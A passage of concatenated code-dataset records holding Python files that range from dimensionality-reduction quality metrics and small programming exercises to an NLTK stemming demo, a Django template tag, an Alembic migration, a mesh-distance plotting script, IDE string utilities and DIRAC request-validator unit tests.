= []\n        for k in range(1, n - 1):\n            common |= {a[k], b[k]}\n            q = (2 * k - len(common)) / (k * n)\n            assert 0 <= q <= 1\n            res.append(q)\n        return res\n\n    def auc_rnx(self):\n        \"\"\"Vectorized version of `self._auc_rnx`\n        \"\"\"\n        idX = np.argsort(squareform(self.dX**2), axis=1)\n        idY = np.argsort(squareform(self.dY**2), axis=1)\n        n = len(idX)\n\n        qnx = [self._qnx(a, b) for a, b in zip(idX, idY)]\n        qnx = np.sum(qnx, axis=0)\n\n        ks = np.arange(1, n - 1)\n        rnx = ((n - 1) * qnx - ks) / (n - 1 - ks)\n        return (rnx / ks).sum() / (1.0 / ks).sum()\n\n    def pearsonr(self):\n        \"\"\"Calculate Pearson correlation coefficient b.w. two vectors\n        $$ \\\\textnormal{CC} =\n        \\\\textnormal{pearson\\\\_correlation}(d^x, d^y) =\n        \\\\frac{\\\\textnormal{Cov}(d^x, d^y)}{\\\\sigma(d^x)\\\\sigma(d^y)}\n        $$\n        \"\"\"\n        p, _ = pearsonr(self.dX, self.dY)\n        return p\n\n    def cca_stress(self):\n        \"\"\"Curvilinear Component Analysis Stress function\n        $$ \\\\textnormal{CCA} = \\\\sum_{ij}^{N}\n        (d^{x}_{ij} - d^{y}_{ij})^2 F_{\\\\lambda}(d^{y}_{ij})\n        $$\n        where $d^{x}_{ij}$ is pairwise distance in high-dim,\n        $d^{y}_{ij}$ is pairwise distance in low-dim,\n        $F_{\\\\lambda}(d^{*}_{ij}$ is decreasing weighting-function.\n        For CCA, there are some choices for weighting-function:\n        e.g. step function (depends $\\\\lambda$), exponential func or\n        $F(d^{y}_{ij}) = 1 - sigmoid(d^{y}_{ij}$.\n        \"\"\"\n        dX = scale(self.dX)\n        dY = scale(self.dY)\n        diff = dX - dY\n        weight = 1.0 - 1.0 / (1.0 + np.exp(-dY))\n        stress = np.dot(diff**2, weight)\n        return stress\n\n    def mds_isotonic(self):\n        \"\"\"Stress function of MDS\n        + Pairwise distances vector in high-dim is fitted into an\n        Isotonic Regression model\n        + The stressMDS function is then applied for the isotonic-fitted\n        vector and the pairwise distance vector in low-dim\n        $$ \\\\textnormal{nMDS} = \\\\sqrt{\\\\frac\n        { \\\\sum_{ij} (d^{iso}_{ij} - d^{y}_{ij})^2 }\n        { \\\\sum_{ij} d^{y}_{ij} } }\n        $$\n        where $d^{y}_{ij}$ is pairwise distance in low-dim.\n        \"\"\"\n        dX = scale(self.dX)\n        dY = scale(self.dY)\n        ir = IsotonicRegression()\n        dYh = ir.fit_transform(X=dX, y=dY)\n        return norm(dYh - dY) / norm(dY)\n\n    def sammon_nlm(self):\n        \"\"\"Stress function for Sammon Nonlinear mapping\n        $ \\\\textnormal{NLM} = \\\\frac{1}{\\\\sum_{ij} d^{x}_{ij}}\n        \\\\sum_{ij} \\\\frac{ (d^{x}_{ij} - d^{y}_{ij})^2 }{d^{x}_{ij}]}\n        $\n        \"\"\"\n        dX = self.dX / np.std(self.dX)\n        dX_inv = np.divide(1.0, dX,\n                           out=np.zeros_like(dX), where=(dX != 0))\n        dY = self.dY / np.std(self.dY)\n        diff = dX - dY\n        stress = np.dot((diff ** 2), dX_inv)\n        return stress / dX.sum()\n\n    def _Qnx(self, k):\n        \"\"\"Calculate $Q_{NX}(k)= \\\\\\\\\n        \\\\frac{1}{Nk} \\\\sum_{i=1}^{N} |v_{i}^{k} \\\\cap n_{i}^{k}| $\n        Args:\n            k (int): number of neighbors\n        Returns:\n            float: value of Q\n        \"\"\"\n        assert 1 <= k <= self.n_samples - 1\n\n        Vk = self.idX[:, :k]\n        Nk = self.idY[:, :k]\n        q_nx = sum([np.intersect1d(a, b, assume_unique=True).size\n                    for a, b in zip(Vk, Nk)])\n        q_nx /= (k * self.n_samples)\n\n        assert 0.0 <= q_nx <= 1.0\n        return q_nx\n\n    def _Rnx(self, k):\n        \"\"\"Calculate rescaled version of $Q_{NX}(k)$\n        $R_{NX}(k) = \\\\frac{(N-1) Q_{NX}(k) - k}{N - 1 - k} $\n        Args:\n            k (int): number of neighbors\n        Returns:\n            float: value of R\n        \"\"\"\n        assert 1 <= k <= self.n_samples - 2\n        rnx = (self.n_samples - 1) * self._Qnx(k) - k\n        rnx /= (self.n_samples - 1 - k)\n        return rnx\n\n    def _auc_rnx(self):\n        \"\"\"Calculate Area under the $R_{NX}(k)$ curve in the log-scale of $k$\n        $$ \\\\textnormal{AUC}_{log}\\\\textnormal{RNX} =\n
        \\frac {\\left(\\sum_{k=1}^{N-2} \\frac{R_{NX}(k)}{k} \\right)}\n            {\\left(\\sum_{k=1}^{N-2}\\frac{1}{k}\\right)}\n        $$\n        \"\"\"\n        auc = sum([self._Rnx(k) / k for k in range(1, self.n_samples - 1)])\n        norm_const = sum([1 / k for k in range(1, self.n_samples - 1)])\n        auc /= norm_const\n        assert 0.0 <= auc <= 1.0\n        return auc\n","sub_path":"validate_contraints/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":5522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"197256097","text":"#!/bin/python3\r\n\r\nimport math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\n# Complete the countingValleys function below.\r\ndef countingValleys(n, s):\r\n    sea_level = 0\r\n    up = 0\r\n    down = 0\r\n    valley = 0\r\n    mountains = 0\r\n    \r\n    for char in s:\r\n        if char == 'U':\r\n            sea_level += 1\r\n            if sea_level==0:\r\n                valley +=1\r\n        else:\r\n            sea_level -=1\r\n    \r\n    return valley\r\n\r\n\r\nif __name__ == '__main__':\r\n    fptr = open(os.environ['OUTPUT_PATH'], 'w')\r\n\r\n    n = int(input())\r\n\r\n    s = input()\r\n\r\n    result = countingValleys(n, s)\r\n\r\n    fptr.write(str(result) + '\\n')\r\n\r\n    fptr.close()\r\n","sub_path":"counting_valleys.py","file_name":"counting_valleys.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"142602561","text":"# Authors: Samwel, Josephine, Modester\n# GitHub handles: @Sammyiel, @Josephine-uwizeye, @Modester-mw\n\n# Question: Input a list of lists and return a single list with each element occurring exactly once.\n\n# defining a function that takes a list of list sums up the lists into a single list and using\n# list and set to remove duplicates\n\ndef list_of_list():\n    fruits = [[\"mango\", \"pineapple\"], [\"pineapple\", \"guava\"]]\n    result = (sum(fruits, []))\n    print(list(set(result)))\n\n    # calling out the function\n\n\nlist_of_list()\n\n","sub_path":"question8.py","file_name":"question8.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"222403356","text":"'''\nPurpose of stemming. To ensure variations of a verb in terms of tense all go back to the same thing to help in decoding the meaning of a sentence\nexample of stemmers...brown stemmer, porter stemmer, snowball stemmer\n'''\nfrom nltk.stem import PorterStemmer,SnowballStemmer,WordNetLemmatizer\nfrom nltk.tokenize import word_tokenize\nps=PorterStemmer()\nexample_words=['python','pythoner','pythoning','pythoned','going','went','go','delayed','coming','running']\nfor w in example_words:\n    print(ps.stem(w))\n\n# use the ps stemmer to stem a sentence after it has been tokenized; ensure the sentence has verbs in varied tenses\n
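# Illustrative example (the sentence is invented, and NLTK's 'punkt' tokenizer data is assumed to be installed):\nsentence=\"She ran home, is running late, and will run again tomorrow\"\nprint([ps.stem(w) for w in word_tokenize(sentence)])\n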
\n#compare with snowball stemmer\nsb=SnowballStemmer('english')\nprint('=================++++++=============++=\\n Snowball stemmer')\nfor w in example_words:\n    print(sb.stem(w))\n# Comparison with lemmatization\n#in lemmatization, you can pass a part-of-speech parameter (pos) saying which part of speech an item belongs to, e.g. lemmatize(\"better\",pos=\"a\")\nprint('=================++++++=============++=\\n Lemmatization')\nwl=WordNetLemmatizer()\nfor w in example_words:\n    print(wl.lemmatize(w))","sub_path":"stemming.py","file_name":"stemming.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"287312529","text":"from django import template\nfrom django.urls import reverse\n\nregister = template.Library()\n\n\n@register.simple_tag(name='pagination_link')\ndef pagination_link(value, page, params=None):\n    if not params:\n        params = ()\n\n    params = params + (page,)\n    if 'paginated' not in value:\n        value = '%s-paginated' % value\n\n    return reverse(value, args=params)\n","sub_path":"sites/templatetags/custom_tags.py","file_name":"custom_tags.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"310231867","text":"\"\"\"Change Table Name\n\nRevision ID: a3135c18513d\nRevises: 12b6ae6ce692\nCreate Date: 2018-11-28 23:03:31.895532\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = 'a3135c18513d'\ndown_revision = '12b6ae6ce692'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.create_table('scheduled_answer',\n    sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n    sa.Column('client_id', sa.Integer(), nullable=True),\n    sa.Column('answer_id', sa.Integer(), nullable=True),\n    sa.Column('is_sent', sa.Boolean(), nullable=False),\n    sa.Column('reply_when', sa.DateTime(), nullable=True),\n    sa.Column('sent_when', sa.DateTime(), nullable=True),\n    sa.Column('created_at', mysql.TIMESTAMP(timezone=True), server_default=sa.text('CURRENT_TIMESTAMP'), nullable=False),\n    sa.Column('updated_at', mysql.TIMESTAMP(timezone=True), server_default=sa.text('CURRENT_TIMESTAMP'), nullable=False),\n    sa.ForeignKeyConstraint(['answer_id'], ['answer.id'], ),\n    sa.ForeignKeyConstraint(['client_id'], ['client.id'], ),\n    sa.PrimaryKeyConstraint('id')\n    )\n    op.drop_table('client_answer')\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('client_answer',\n sa.Column('id', mysql.INTEGER(display_width=11), autoincrement=True, nullable=False),\n sa.Column('client_id', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True),\n sa.Column('answer_id', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True),\n sa.Column('is_sent', mysql.TINYINT(display_width=1), autoincrement=False, nullable=False),\n sa.Column('reply_when', mysql.DATETIME(), nullable=True),\n sa.Column('sent_when', mysql.DATETIME(), nullable=True),\n sa.Column('created_at', mysql.TIMESTAMP(), server_default=sa.text('CURRENT_TIMESTAMP'), nullable=False),\n sa.Column('updated_at', mysql.TIMESTAMP(), server_default=sa.text('CURRENT_TIMESTAMP'), nullable=False),\n sa.ForeignKeyConstraint(['answer_id'], ['answer.id'], name='client_answer_ibfk_1'),\n sa.ForeignKeyConstraint(['client_id'], ['client.id'], name='client_answer_ibfk_2'),\n sa.PrimaryKeyConstraint('id'),\n mysql_collate='utf8mb4_0900_ai_ci',\n mysql_default_charset='utf8mb4',\n mysql_engine='InnoDB'\n )\n op.drop_table('scheduled_answer')\n # ### end Alembic commands ###\n","sub_path":"database/versions/a3135c18513d_change_table_name.py","file_name":"a3135c18513d_change_table_name.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"544708804","text":"import random\n\nimport matplotlib\nimport numpy as np\nimport generator_shape as gn\nimport matplotlib.pyplot as plt\nimport dist_eval as evl\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.cm as cm\n\n#spehere: 162,642,2562 #change radius as well\n\n#mesh1 = gn.sphere_generator(9.5, 162)\n#mesh2 = gn.sphere_generator(10, 162)\n\nradius = random.randint(0,100)\nnoise = radius/100\nnum_points = 162 #spehere: 162,642,2562 #change radius as well\n\nmesh1 = gn.sphere_generator(radius, num_points, noise)\n\nif radius%2 == 0:\n mesh2 = gn.sphere_generator(radius-noise, num_points, 0)\nelse:\n mesh2 = gn.sphere_generator(radius+noise, num_points, 0)\n\n\n\n#mesh1 = gn.sphere_generator(7.5, 2542)\n#mesh2 = gn.sphere_generator(10, 2562)\n\n\n#Target Mesh\nfig0 = plt.figure()\nax0 = fig0.add_subplot(111, projection='3d')\nax0.set_title(\"Target Mesh\")\n\nxtrg = mesh2[:, 0]\nytrg = mesh2[:, 1]\nztrg = mesh2[:, 2]\n\nax0 = ax0.scatter3D(xtrg, ytrg, ztrg, s=1)\n\n#RMS Heat Map without Normalize\nrms_dis = evl.rms_without_normalize(mesh1, mesh2)\n\nfig2 = plt.figure()\nax2 = fig2.add_subplot(111, projection='3d')\nax2.set_title(\"RMS Heat Map without Normalize - RMS Score: \"+ str(sum(rms_dis)/len(rms_dis)))\n\nxtest = mesh1[:, 0]\nytest = mesh1[:, 1]\nztest = mesh1[:, 2]\n\nax2 = ax2.scatter3D(xtest, ytest, ztest, c=rms_dis, cmap='Spectral_r', s=50);\n\nfig2.colorbar(ax2)\n\n#RMS Heat Map with Normalize\nrms_dis_w_no = evl.rms_with_normalize(mesh1, mesh2)\n\nfig2 = plt.figure()\nax2 = fig2.add_subplot(111, projection='3d')\nax2.set_title(\"RMS Heat Map with Normalize - RMS Score: \"+ str(sum(rms_dis_w_no)/len(rms_dis_w_no)))\n\nxtest = mesh1[:, 0]\nytest = mesh1[:, 1]\nztest = mesh1[:, 2]\n\nax2 = ax2.scatter3D((xtest - np.min(xtest)) / np.ptp(xtest), (ytest - np.min(ytest)) / np.ptp(ytest), (ztest - np.min(ztest)) / np.ptp(ztest), c=rms_dis_w_no, cmap='Spectral_r', s=50);\n\nfig2.colorbar(ax2)\n\n#Chamfer Heat Map without Normalize\ncham_dis = evl.chamfer_without_normalize(mesh1, mesh2)\n\nfig3 = plt.figure()\nax3 = fig3.add_subplot(111, projection='3d')\nax3.set_title(\"Chamfer Heat Map without Normalize - Chamfer 
Score: \"+ str(sum(cham_dis)/len(cham_dis)))\n\nxtest = mesh1[:, 0]\nytest = mesh1[:, 1]\nztest = mesh1[:, 2]\n\nax3 = ax3.scatter3D(xtest, ytest, ztest, c=cham_dis, cmap='Spectral_r', s=50);\n\nfig3.colorbar(ax3)\n\n#Chamfer Heat Map with Normalize\ncham_dis_w_no = evl.chamfer_with_normalize(mesh1, mesh2)\n\nfig4 = plt.figure()\nax4 = fig4.add_subplot(111, projection='3d')\nax4.set_title(\"Chamfer Heat Map with Normalize - Chamfer Score: \"+ str(sum(cham_dis_w_no)/len(cham_dis_w_no)))\n\nxtest = mesh1[:, 0]\nytest = mesh1[:, 1]\nztest = mesh1[:, 2]\n\nax4 = ax4.scatter3D((xtest - np.min(xtest)) / np.ptp(xtest), (ytest - np.min(ytest)) / np.ptp(ytest), (ztest - np.min(ztest)) / np.ptp(ztest), c=cham_dis_w_no, cmap='Spectral_r', s=50);\n\nfig4.colorbar(ax4)\n\n# uniform\n\nfig5 = plt.figure()\nax5 = fig5.gca(projection='3d')\nax5.set_aspect(\"equal\")\n\nu, v = np.mgrid[0:2*np.pi:18j, 0:np.pi:9j]\nx = np.cos(u)*np.sin(v)\ny = np.sin(u)*np.sin(v)\nz = np.cos(v)\n\n\n\n#ax5.scatter(x, y, z, c=cham_dis_w_no,cmap='Spectral_r',s=100)\n#print(cham_dis_w_no)\n#cham_dis_w_no = np.reshape(cham_dis_w_no,(169,1))\n#print(cham_dis_w_no)\n\ncolor_dimension = np.reshape(cham_dis_w_no,(18,9)) # change to desired fourth dimension\nminn, maxx = color_dimension.min(), color_dimension.max()\nnorm = matplotlib.colors.Normalize(minn, maxx)\nm = plt.cm.ScalarMappable(norm=norm, cmap='Spectral_r')\nm.set_array([])\nfcolors = m.to_rgba(color_dimension)\n\nprint(fcolors.shape)\n\nax5.plot_surface(x, y, z, facecolors=fcolors,alpha=1)\n\nfig5.colorbar(m)\n\nplt.show()","sub_path":"sphere_eval.py","file_name":"sphere_eval.py","file_ext":"py","file_size_in_byte":3581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"632093311","text":"# -*- coding: utf-8 -*-\r\n#-------------------------------------------------------------------------------\r\n# Name: strutils.py\r\n# Purpose:\r\n#\r\n# Author: wukan\r\n#\r\n# Created: 2019-01-18\r\n# Copyright: (c) wukan 2019\r\n# Licence: GPL-3.0\r\n#-------------------------------------------------------------------------------\r\n\r\nimport os\r\nimport re\r\nimport noval.python.parser.utils as parserutils\r\nfrom noval.util import apputils\r\nfrom noval import _,GetApp\r\nimport noval.util.txtutils as txtutils\r\nimport shlex\r\n\r\ndef caseInsensitiveCompare(s1, s2):\r\n \"\"\" Method used by sort() to sort values in case insensitive order \"\"\"\r\n s1L = s1.lower()\r\n s2L = s2.lower()\r\n if s1L == s2L:\r\n return 0\r\n elif s1L < s2L:\r\n return -1\r\n else:\r\n return 1\r\n\r\ndef multiSplit(stringList, tokenList=[\" \"]):\r\n \"\"\"Splits strings in stringList by tokens, returns list of string.\"\"\"\r\n if not stringList: return []\r\n if isinstance(tokenList, basestring):\r\n tokenList = [tokenList]\r\n if isinstance(stringList, basestring):\r\n stringList = [stringList]\r\n rtnList = stringList\r\n for token in tokenList:\r\n rtnList = rtnList[:]\r\n for string in rtnList:\r\n if string.find(token) > -1:\r\n rtnList.remove(string)\r\n names = string.split(token)\r\n for name in names:\r\n name = name.strip()\r\n if name:\r\n rtnList.append(name)\r\n return rtnList\r\n\r\nQUOTES = (\"\\\"\", \"'\")\r\n\r\ndef _findArgStart(argStr):\r\n i = -1\r\n for c in argStr:\r\n i += 1\r\n if (c == \" \"):\r\n continue\r\n elif (c == \",\"):\r\n continue\r\n return i\r\n return None\r\n\r\ndef _findArgEnd(argStr):\r\n quotedArg = True\r\n argEndChar = argStr[0]\r\n if (not argEndChar in QUOTES):\r\n argEndChar = \",\"\r\n 
quotedArg = False\r\n    i = -1\r\n    firstChar = True\r\n    for c in argStr:\r\n        i+= 1\r\n        if (firstChar):\r\n            firstChar = False\r\n            if (quotedArg):\r\n                continue\r\n        if (c == argEndChar):\r\n            if (quotedArg):\r\n                return min(i+1, len(argStr))\r\n            else:\r\n                return i\r\n    return i\r\n\r\ndef parseArgs(argStr, stripQuotes=False):\r\n    \"\"\"\r\n    Given a str representation of method arguments, returns list arguments (as\r\n    strings).\r\n    \r\n    Input: \"('[a,b]', 'c', 1)\" -> Output: [\"'[a,b]'\", \"'c'\", \"1\"].\r\n\r\n    If stripQuotes, removes quotes from quoted arg.\r\n    \"\"\"\r\n    if (argStr.startswith(\"(\")):\r\n        argStr = argStr[1:]\r\n        if (argStr.endswith(\")\")):\r\n            argStr = argStr[:-1]\r\n        else:\r\n            raise AssertionError(\"Expected argStr to end with ')'\")\r\n\r\n    rtn = []\r\n    argsStr = argStr.strip()\r\n    while (True):\r\n        startIndex = _findArgStart(argStr)\r\n        if (startIndex == None):\r\n            break\r\n        argStr = argStr[startIndex:]\r\n        endIndex = _findArgEnd(argStr)\r\n        if (endIndex == len(argStr) - 1):\r\n            rtn.append(argStr.strip())\r\n            break \r\n        t = argStr[:endIndex].strip()\r\n        if (stripQuotes and t[0] in QUOTES and t[-1] in QUOTES):\r\n            t = t[1:-1]\r\n        rtn.append(t)\r\n        argStr = argStr[endIndex:]\r\n    return rtn\r\n\r\ndef get_file_extension(filename,to_lower=True,has_dot=False):\r\n    basename = os.path.basename(filename)\r\n    names = basename.split(\".\")\r\n    if 1 == len(names):\r\n        return \"\"\r\n    if to_lower:\r\n        ext = names[-1].lower()\r\n    else:\r\n        ext = names[-1]\r\n    if has_dot:\r\n        ext = \".\" + ext\r\n    return ext\r\n    \r\n\r\ndef MakeNameEndInExtension(name, extension):\r\n    if not name:\r\n        return name\r\n    ext = get_file_extension(name)\r\n    if ext == extension:\r\n        return name\r\n    else:\r\n        return name + extension\r\n    \r\ndef get_filename_without_ext(file_path_name):\r\n    filename = os.path.basename(file_path_name)\r\n    return os.path.splitext(filename)[0]\r\n\r\ndef get_python_coding_declare(lines):\r\n    # Only consider the first two lines\r\n    CODING_REG_STR = re.compile(r'^[ \\t\\f]*#.*coding[:=][ \\t]*([-\\w.]+)')\r\n    BLANK_REG_STR = re.compile(r'^[ \\t\\f]*(?:[#\\r\\n]|$)')\r\n    lst = lines[:2]\r\n    hit_line = 0\r\n    for line in lst:\r\n        match = CODING_REG_STR.match(line)\r\n        if match is not None:\r\n            break\r\n        if not BLANK_REG_STR.match(line):\r\n            return None,-1\r\n        hit_line += 1\r\n    else:\r\n        return None,-1\r\n    name = match.group(1)\r\n    return name,hit_line\r\n    \r\ndef emphasis_path(path):\r\n    path = \"\\\"%s\\\"\" % path\r\n    return path\r\n    \r\ndef gen_file_filters(exclude_template_type = None):\r\n    filters = []\r\n    for temp in GetApp().GetDocumentManager().GetTemplates():\r\n        if exclude_template_type is not None and (temp.GetDocumentType() == exclude_template_type):\r\n            continue\r\n        if temp.IsVisible():\r\n            filter = get_template_filter(temp)\r\n            filters.append(filter)\r\n    filters.append((_(\"All Files\"),\".*\"))\r\n    # Reverse the list so that \"All Files\" shows up on the first visible row\r\n    filters = filters[::-1]\r\n    return filters\r\n    \r\ndef get_template_filter(template):\r\n    descr = template.GetFileFilter()\r\n    filter_types = [l.lstrip(\"*\") for l in descr.split(\";\")]\r\n    return (template.GetDescription(),' '.join(filter_types))\r\n    \r\n\r\ndef HexToRGB(hex_str):\r\n    \"\"\"Returns a list of red/green/blue values from a\r\n    hex string.\r\n    @param hex_str: hex string to convert to rgb\r\n\r\n    \"\"\"\r\n    hexval = hex_str\r\n    if hexval[0] == u\"#\":\r\n        hexval = hexval[1:]\r\n    ldiff = 6 - len(hexval)\r\n    hexval += ldiff * u\"0\"\r\n    # Convert hex values to integer\r\n    red = int(hexval[0:2], 16)\r\n    green = int(hexval[2:4], 
16)\r\n    blue = int(hexval[4:], 16)\r\n    return [red, green, blue]\r\n    \r\ndef RGBToHex(clr):\r\n    return \"#%02x%02x%02x\" % (clr.Red(),clr.Green(),clr.Blue())\r\n    \r\n\r\ndef EncodeString(string, encoding=None):\r\n    \"\"\"Try and encode a given unicode object to a string\r\n    with the provided encoding returning that string. The\r\n    default encoding will be used if None is given for the\r\n    encoding.\r\n    @param string: unicode object to encode into a string\r\n    @keyword encoding: encoding to use for conversion\r\n\r\n    \"\"\"\r\n    if not encoding:\r\n        encoding = \"utf-8\"  # no module-level default encoding is defined in this file, so fall back to utf-8\r\n\r\n    if txtutils.IsUnicode(string):\r\n        try:\r\n            rtxt = string.encode(encoding)\r\n        except LookupError:\r\n            rtxt = string\r\n        return rtxt\r\n    else:\r\n        return string\r\n    \r\n\r\ndef is_none_or_empty(value_str):\r\n    return parserutils.IsNoneOrEmpty(value_str)\r\n    \r\ndef is_same_path(path1,path2):\r\n    return parserutils.ComparePath(path1,path2)\r\n    \r\ndef compare_version(new_ver_str,old_ver_str):\r\n    new_ver = parserutils.CalcVersionValue(new_ver_str)\r\n    old_ver = parserutils.CalcVersionValue(old_ver_str)\r\n    if new_ver == old_ver:\r\n        return 0\r\n    elif new_ver > old_ver:\r\n        return 1\r\n    else:\r\n        return -1\r\n    \r\n\r\ndef isInArgs(argname, argv):\r\n    result = False\r\n    if (\"-\" + argname) in argv:\r\n        result = True\r\n    if apputils.is_windows() and (\"/\" + argname) in argv:\r\n        result = True    \r\n    return result\r\n    \r\ndef path_startswith(child_name, dir_name):\r\n    '''\r\n    Check whether dir_name contains (or equals) child_name\r\n    '''\r\n    normchild = os.path.normpath(os.path.normcase(child_name))\r\n    normdir = os.path.normpath(os.path.normcase(dir_name))\r\n    return normdir == normchild or normchild.startswith(normdir.rstrip(os.path.sep) + os.path.sep)\r\n\r\ndef normpath_with_actual_case(name):\r\n    \"\"\"In Windows return the path with the case it is stored in the filesystem\"\"\"\r\n    assert os.path.isabs(name) or os.path.ismount(name), \"Not abs nor mount: \" + name\r\n    assert os.path.exists(name), \"Not exists: \" + name\r\n    if os.name == \"nt\":\r\n        name = os.path.realpath(name)\r\n        from ctypes import create_unicode_buffer, windll\r\n        buf = create_unicode_buffer(512)\r\n        windll.kernel32.GetShortPathNameW(name, buf, 512)  # @UndefinedVariable\r\n        windll.kernel32.GetLongPathNameW(buf.value, buf, 512)  # @UndefinedVariable\r\n        if len(buf.value):\r\n            result = buf.value\r\n        else:\r\n            result = name\r\n        assert isinstance(result, str)\r\n        if result[1] == \":\":\r\n            # ensure drive letter is capital\r\n            return result[0].upper() + result[1:]\r\n        else:\r\n            return result\r\n    else:\r\n        return os.path.normpath(name)\r\n    \r\ndef is_sample_file(file_1,file_2):\r\n    \r\n    if apputils.is_py3_plus():\r\n        return os.path.samefile(file_1,file_2)\r\n    elif apputils.is_py2():\r\n        return 0 == caseInsensitiveCompare(normpath_with_actual_case(file_1),normpath_with_actual_case(file_2))\r\n    \r\n\r\ndef shorten_repr(original_repr, max_len = 1000):\r\n    if len(original_repr) > max_len:\r\n        return original_repr[: max_len - 1] + \"…\"\r\n    else:\r\n        return original_repr\r\n\r\ndef parse_cmd_line(s,posix=False):\r\n    return shlex.split(s, posix=posix)","sub_path":"noval/util/strutils.py","file_name":"strutils.py","file_ext":"py","file_size_in_byte":9129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"222224415","text":"########################################################################\n# $HeadURL $\n# File: RequestValidatorTests.py\n# Author: Krzysztof.Ciba@NOSPAMgmail.com\n# Date: 2012/09/25 
13:49:20\n########################################################################\n\n\"\"\" :mod: RequestValidatorTests \n =======================\n \n .. module: RequestValidatorTests\n :synopsis: test cases for RequestValidator\n .. moduleauthor:: Krzysztof.Ciba@NOSPAMgmail.com\n\n test cases for RequestValidator\n\"\"\"\n\n__RCSID__ = \"$Id $\"\n\n##\n# @file RequestValidatorTests.py\n# @author Krzysztof.Ciba@NOSPAMgmail.com\n# @date 2012/09/25 13:49:31\n# @brief Definition of RequestValidatorTests class.\n\n## imports \nimport unittest\n## from DIRAC\nfrom DIRAC.RequestManagementSystem.Client.Request import Request\nfrom DIRAC.RequestManagementSystem.Client.Operation import Operation\nfrom DIRAC.RequestManagementSystem.Client.File import File\n## SUT\nfrom DIRAC.RequestManagementSystem.private.RequestValidator import RequestValidator\n\n\n########################################################################\nclass RequestValidatorTests(unittest.TestCase):\n \"\"\"\n .. class:: RequestValidatorTests\n \n \"\"\"\n\n def setUp( self ):\n \"\"\" test setup \"\"\"\n self.request = Request()\n self.operation = Operation()\n self.file = File()\n\n def tearDown( self ):\n \"\"\" test tear down \"\"\"\n del self.request\n del self.operation\n del self.file\n\n def testValidator( self ):\n \"\"\" validator test \"\"\"\n \n ## create validator\n validator = RequestValidator()\n self.assertEqual( isinstance( validator, RequestValidator ), True )\n\n ## RequestName not set \n ret = validator.validate( self.request )\n self.assertEqual( ret, { 'Message' : 'RequestName not set', \n 'OK' : False } )\n self.request.RequestName = \"test_request\"\n\n # # no ownerDN\n ret = validator.validate( self.request )\n self.assertEqual( ret, { 'Message' : \"Request 'test_request' is missing OwnerDN value\",\n 'OK': False} )\n self.request.OwnerDN = \"foo/bar=baz\"\n\n # # no owner group\n ret = validator.validate( self.request )\n self.assertEqual( ret, { 'Message' : \"Request 'test_request' is missing OwnerGroup value\",\n 'OK': False} )\n self.request.OwnerGroup = \"dirac_user\"\n\n\n ## no operations \n ret = validator.validate( self.request )\n self.assertEqual( ret, { 'Message' : \"Operations not present in request 'test_request'\", \n 'OK': False} ) \n self.request.addOperation( self.operation )\n\n ## type not set\n ret = validator.validate( self.request )\n self.assertEqual( ret, { 'Message' : \"Operation #0 in request 'test_request' hasn't got Type set\", \n 'OK' : False } )\n self.operation.Type = \"ReplicateAndRegister\"\n\n ## files not present \n ret = validator.validate( self.request )\n self.assertEqual( ret, { 'Message' : \"Operation #0 of type 'ReplicateAndRegister' hasn't got files to process.\", \n 'OK' : False } )\n self.operation.addFile( self.file ) \n\n ## targetSE not set\n ret = validator.validate( self.request )\n self.assertEqual( ret, { 'Message' : \"Operation #0 of type 'ReplicateAndRegister' is missing TargetSE attribute.\", \n 'OK': False } )\n self.operation.TargetSE = \"CERN-USER\"\n\n ## missing LFN\n ret = validator.validate( self.request )\n self.assertEqual( ret, \n { \"Message\" : \"Operation #0 of type 'ReplicateAndRegister' is missing LFN attribute for file.\", \n \"OK\": False } )\n self.file.LFN = \"/a/b/c\"\n\n\n ## Checksum set, ChecksumType not set \n self.file.Checksum = \"abcdef\"\n ret = validator.validate( self.request )\n self.assertEqual( ret, \n { 'Message' : 'File in operation #0 is missing Checksum (abcdef) or ChecksumType ()',\n 'OK' : False } ) \n\n\n ## 
ChecksumType set, Checksum not set \n self.file.Checksum = \"\"\n self.file.ChecksumType = \"adler32\"\n\n ret = validator.validate( self.request )\n self.assertEqual( ret, \n { 'Message' : 'File in operation #0 is missing Checksum () or ChecksumType (ADLER32)', \n 'OK' : False } )\n \n ## both set\n self.file.Checksum = \"abcdef\"\n self.file.ChecksumType = \"adler32\"\n ret = validator.validate( self.request )\n self.assertEqual( ret, {'OK': True, 'Value': ''} )\n \n ## both unset\n self.file.Checksum = \"\"\n self.file.ChecksumType = None\n ret = validator.validate( self.request )\n self.assertEqual( ret, {'OK': True, 'Value': ''} )\n\n ## all OK\n ret = validator.validate( self.request )\n self.assertEqual( ret, {'OK': True, 'Value': ''} )\n\n \n## test suite execution \nif __name__ == \"__main__\":\n gTestLoader = unittest.TestLoader()\n gSuite = gTestLoader.loadTestsFromTestCase( RequestValidatorTests )\n gSuite = unittest.TestSuite( [ gSuite ] )\n unittest.TextTestRunner(verbosity=3).run( gSuite 